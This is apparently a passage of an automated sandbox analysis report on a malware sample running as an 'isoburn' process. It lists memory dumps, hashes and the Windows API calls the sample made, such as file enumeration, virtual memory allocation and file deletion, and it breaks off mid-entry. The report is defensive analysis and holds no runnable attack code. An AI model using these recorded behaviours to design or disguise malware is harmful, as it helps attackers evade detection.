                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                            • API String ID: 0-2877786613
                                                                                                                            • Opcode ID: a8b5422b31cd4b648513d401d266d71b23f75cae4631e7807b02f145d2f085b1
                                                                                                                            • Instruction ID: 8a85f8c83aaffdba786d70a08cdf108730dc67be2a638e95b5f50457ae49251c
                                                                                                                            • Opcode Fuzzy Hash: a8b5422b31cd4b648513d401d266d71b23f75cae4631e7807b02f145d2f085b1
                                                                                                                            • Instruction Fuzzy Hash: 5C41A275961A297FEB01EB94CC02FFF773CAF55700F408049F614AB281E7B46A418BA6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                            • API String ID: 0-2877786613
                                                                                                                            • Opcode ID: de615dae7a0058292bd6d8e103770f6a6032175ab8570c2000e91845ced86895
                                                                                                                            • Instruction ID: 57258cd10a7b65106285654e1180825db2884d246662da8090f62aaedf61e1ad
                                                                                                                            • Opcode Fuzzy Hash: de615dae7a0058292bd6d8e103770f6a6032175ab8570c2000e91845ced86895
                                                                                                                            • Instruction Fuzzy Hash: E8318075961A297FEB01EB94CC02FFF773CAF55700F404049FA14AB281E7B46A418BA6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$h$o
                                                                                                                            • API String ID: 0-3662636641
                                                                                                                            • Opcode ID: 1214df47e0ef03c80a2cea39ad4e4dfb3cfc067ccdb1f28c8b83395e691c4ee7
                                                                                                                            • Instruction ID: e63b9cb7500170b52d0adf0a2702a59c364edfd714d142e8a4bdd9c3296faa74
                                                                                                                            • Opcode Fuzzy Hash: 1214df47e0ef03c80a2cea39ad4e4dfb3cfc067ccdb1f28c8b83395e691c4ee7
                                                                                                                            • Instruction Fuzzy Hash: D54165B5C153286BEB11EBA4CC45FEEB378BF48700F40969AA50DB6140EBB45BC48F95
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$k$o
                                                                                                                            • API String ID: 0-3624523832
                                                                                                                            • Opcode ID: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                                                                                            • Instruction ID: 8acb68d3b40d2f558dacc3464791d56212b3b0d6a6f6d475b920e074dd73ffe7
                                                                                                                            • Opcode Fuzzy Hash: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                                                                                            • Instruction Fuzzy Hash: F311EBB5910318ABDF14DF94DC84ADEBBB9FF45714F04824EE9195B101E3B1D544CBA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$k$o
                                                                                                                            • API String ID: 0-3624523832
                                                                                                                            • Opcode ID: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                                                                                            • Instruction ID: 3d52c98d89c84d865cd0554e8630565d8a19d33457670a3d46f7693d4fcae780
                                                                                                                            • Opcode Fuzzy Hash: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                                                                                            • Instruction Fuzzy Hash: F901C0B2900318ABDB14DF98D884ADEF7B9FF48714F048209E919AB201E771E944CBA0

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:4.4%
                                                                                                                            Signature Coverage:1.6%
                                                                                                                            Total number of Nodes:434
                                                                                                                            Total number of Limit Nodes:69
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D2C5C4
                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02D2C5FF
                                                                                                                            • FindClose.KERNELBASE(?), ref: 02D2C60A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                                                            • Instruction ID: c9aeaa8f4e9289fff01d012c566a7058258f4997ae1630098b055ac42a5625a3
                                                                                                                            • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                                                            • Instruction Fuzzy Hash: E731B071900258BBDB20DB60CC85FEF737DEB55749F104549F908A6290EB70AE84CBA0
                                                                                                                            APIs
                                                                                                                            • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02D391A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                                                            • Instruction ID: bacf252883f7ffb5e92952bf400ee63a9c6364d5efdde7fd80a54d142fd60181
                                                                                                                            • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                                                            • Instruction Fuzzy Hash: 3731C1B5A01648ABDB54DF98D880EEEB7F9EF88710F108619F919A7340D770A941CFA4
                                                                                                                            APIs
                                                                                                                            • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02D392F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                                                            • Instruction ID: 04fbfb09541542e4d3c754d3a18b17149e0da722f42aceb01bb660a76e382539
                                                                                                                            • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                                                            • Instruction Fuzzy Hash: EB31D0B5A00608ABDB14DF98D881EEFB7F9EB88714F108219F918A7341D770A911CFA4
                                                                                                                            APIs
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(02D21CAE,9ACB2CF8,02D37EAF,00000000,00000004,00003000,?,?,?,?,?,02D37EAF,02D21CAE), ref: 02D395DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2167126740-0
                                                                                                                            • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                                                            • Instruction ID: 624006ea6597bb82759065c9fe54e8e5a3f908b7ac2d5fa946a4055ecc863ff0
                                                                                                                            • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                                                            • Instruction Fuzzy Hash: B12126B5A00609ABDB10DF98D841FEFB7B9EF89700F104619F918A7341DB70A911CBA4
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033686569-0
                                                                                                                            • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                                                            • Instruction ID: 861977693db6fe156f7b02e9726e36f45866ecdfddc273868accf77c282f19fd
                                                                                                                            • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                                                            • Instruction Fuzzy Hash: 8B119E71601A047AE720EB68DC01FEFB3ACEF86714F104619FA18A7281DB75B9058BB5
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D393D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction ID: f899513e8f3b91019cf67fcf8c7ab1d843efcdb44c6a421e124683e1902aad69
                                                                                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction Fuzzy Hash: 74E046362006547BE220EB69EC41FDB77ADDBC6710F004119FA0CA7242C671BA108BB0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 66088723605e128678cbbfe8a66aa738e505e423c3a47575447f99a5997b1f4e
                                                                                                                            • Instruction ID: 5948edde21370538d705b196c488a98b9b722e7e96549b16224a074cd1111c90
                                                                                                                            • Opcode Fuzzy Hash: 66088723605e128678cbbfe8a66aa738e505e423c3a47575447f99a5997b1f4e
                                                                                                                            • Instruction Fuzzy Hash: 3F9002626015004251407158984440B60159BE13113E5C115B8554560C86188D559669
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8778f544439ba0e950798f296c0eaea612527143d14142160d29ca36959d5857
                                                                                                                            • Instruction ID: cb078fc5adc8a3aa38519acdb7886d7c0a459edb7e43c42d4b9d56b8fe91b1d7
                                                                                                                            • Opcode Fuzzy Hash: 8778f544439ba0e950798f296c0eaea612527143d14142160d29ca36959d5857
                                                                                                                            • Instruction Fuzzy Hash: 3290023260580012A140715898C454B40159BE0311BA5C011F8424554C8A148E565761
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 0eef97e5ead837ccfa5246fa851c1d7aee92900bfcbe36b728cc8cdd97a643b1
                                                                                                                            • Instruction ID: 2eb4444002d3f955e26950e46169e7780786296cc25ff4e3bb6d23ae1d541583
                                                                                                                            • Opcode Fuzzy Hash: 0eef97e5ead837ccfa5246fa851c1d7aee92900bfcbe36b728cc8cdd97a643b1
                                                                                                                            • Instruction Fuzzy Hash: CD90022A21340002E1807158A44860F00158BD1212FE5D415B8015558CC9158D695721
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9df28b99c7de7ac1c9478975bcb821b6fbf297f7434c97fa97ca029755abcbbd
                                                                                                                            • Instruction ID: 15f3aa509f08bc3e30c80b1de2001fa0492fc5579ff0e0f920a21a269b295eb3
                                                                                                                            • Opcode Fuzzy Hash: 9df28b99c7de7ac1c9478975bcb821b6fbf297f7434c97fa97ca029755abcbbd
                                                                                                                            • Instruction Fuzzy Hash: 7090022230140003E1407158A45860B4015DBE1311FA5D011F8414554CD9158D565622
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: da25d9e66c6fe31ded42e5e60556711fe5d6cd64a25c93fbe9ad83e8c0c8d89d
                                                                                                                            • Instruction ID: afb8310262c11e600db0d02edc61ec05434a3e6da94523f650b430082047a97d
                                                                                                                            • Opcode Fuzzy Hash: da25d9e66c6fe31ded42e5e60556711fe5d6cd64a25c93fbe9ad83e8c0c8d89d
                                                                                                                            • Instruction Fuzzy Hash: C5900222242441526545B158944450B40169BE02517E5C012B9414950C85269D56DA21
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 68ba8a57e98093551567254a0599849446957204452c43edcfd612f7a07a53dc
                                                                                                                            • Instruction ID: 7b2295714a2fef0cd0f6354b63dc66834eac72198da2754643bc10eb4a34dea9
                                                                                                                            • Opcode Fuzzy Hash: 68ba8a57e98093551567254a0599849446957204452c43edcfd612f7a07a53dc
                                                                                                                            • Instruction Fuzzy Hash: CC90023220140413E1117158954470B00198BD0251FE5C412B8424558D96568E52A521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 13c2d7f6a2451f150d9242b6e8045e5ba428a70355a6838465ded692020720de
                                                                                                                            • Instruction ID: 0d35c6a558276bd2ca12451bdc5724ee7202559ccdc22b08e237546b6af42d8a
                                                                                                                            • Opcode Fuzzy Hash: 13c2d7f6a2451f150d9242b6e8045e5ba428a70355a6838465ded692020720de
                                                                                                                            • Instruction Fuzzy Hash: FD90023220140842E10071589444B4B00158BE0311FA5C016B8124654D8615CD517921
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 1f05ad9f3cf9e6b360278983d99512548a75c78dc9abc5c666c5f3e2eb0764da
                                                                                                                            • Instruction ID: d8f65d0dc81e4944e33c92b3588a3cf4069b1d7bfc650dfb1e1b88404d0569ba
                                                                                                                            • Opcode Fuzzy Hash: 1f05ad9f3cf9e6b360278983d99512548a75c78dc9abc5c666c5f3e2eb0764da
                                                                                                                            • Instruction Fuzzy Hash: CD90023220148802E1107158D44474F00158BD0311FA9C411BC424658D86958D917521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 99ff60bcef91945d9664c0f51b2e7a69b5d8f5470a938cb22d889c8fa7a5c149
                                                                                                                            • Instruction ID: 82b4533bd2b847a7e189e78d5d02132cb6c212b285f60a6a46a7ad929307726d
                                                                                                                            • Opcode Fuzzy Hash: 99ff60bcef91945d9664c0f51b2e7a69b5d8f5470a938cb22d889c8fa7a5c149
                                                                                                                            • Instruction Fuzzy Hash: 9F90023220140402E1007598A44864B00158BE0311FA5D011BD024555EC6658D916531
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: a4896a8fe6acf2a4a4332c7bcc6128b6249dac0fd94964baadbddec12d04dc08
                                                                                                                            • Instruction ID: 189dfa121cd4d93a92f4bf60ff0e58be10723c589a10f5fb68bba750e113db22
                                                                                                                            • Opcode Fuzzy Hash: a4896a8fe6acf2a4a4332c7bcc6128b6249dac0fd94964baadbddec12d04dc08
                                                                                                                            • Instruction Fuzzy Hash: 7590026234140442E10071589454B0B0015CBE1311FA5C015F9064554D8619CD526526
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 266afdcf22a7498e622888878355d1766ebb09c1bbd930175c76394334d771ef
                                                                                                                            • Instruction ID: a9adb0fa77b19ba01ccf8b004f24145d8cc510db039e95358498b54bdf4253a4
                                                                                                                            • Opcode Fuzzy Hash: 266afdcf22a7498e622888878355d1766ebb09c1bbd930175c76394334d771ef
                                                                                                                            • Instruction Fuzzy Hash: 8E9002226014004251407168D88490B4015AFE12217A5C121B8998550D85598D655A65
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 5e1fac69c9f628ec59f4b49db9b6d18cda74974875dcecb476b2fd880b0b6b43
                                                                                                                            • Instruction ID: 6ed0c9d16e642f118faba49b42d93bb01f00184ddb4c2c97e184eea7dc98e0d3
                                                                                                                            • Opcode Fuzzy Hash: 5e1fac69c9f628ec59f4b49db9b6d18cda74974875dcecb476b2fd880b0b6b43
                                                                                                                            • Instruction Fuzzy Hash: 99900222211C0042E20075689C54B0B00158BD0313FA5C115B8154554CC9158D615921
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 48900fca7fc05f0547430222cb4a29d725b7571a37a598a421fbaf4a1ceddd69
                                                                                                                            • Instruction ID: e454a7bda82aa8f3c8350dd52998dc987f791803d267d628a791e71248a8c472
                                                                                                                            • Opcode Fuzzy Hash: 48900fca7fc05f0547430222cb4a29d725b7571a37a598a421fbaf4a1ceddd69
                                                                                                                            • Instruction Fuzzy Hash: 6490022260140502E1017158944461B001A8BD0251FE5C022B9024555ECA258E92A531
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
